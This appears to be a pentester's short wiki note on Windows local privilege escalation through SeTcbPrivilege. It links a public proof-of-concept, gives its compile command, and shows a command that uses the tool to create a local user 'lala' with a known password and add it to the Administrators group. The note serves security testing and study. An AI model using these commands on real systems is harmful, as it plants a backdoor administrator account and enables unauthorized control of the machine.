Skip to content

SeTcbPrivilege

Resources: https://adminions.ca/books/windows-attacks-and-enumerations/page/windows-local-privilege-escalation

TcbElevation.cpp

Original source: https://gist.github.com/antonioCoco/19563adef860614b56d010d92e67d178

My refined version ( Visual Studio 2022): 

1
cl /nologo /EHsc /FeTcbElevation.exe .\TcbElevate.cpp /DUNICODE /D_UNICODE /link Advapi32.lib ntdll.lib

The tester executed 'TcbElevation.exe' to create a new local user lala with password 'lala123' and add it to the Administrators group:

1
.\TcbElevation.exe nonexistentservice "C:\Windows\System32\cmd.exe /c net user lala lala123 /add && net localgroup administrators lala /add"
Last update: 2025-12-21
Created: December 21, 2025 12:46:39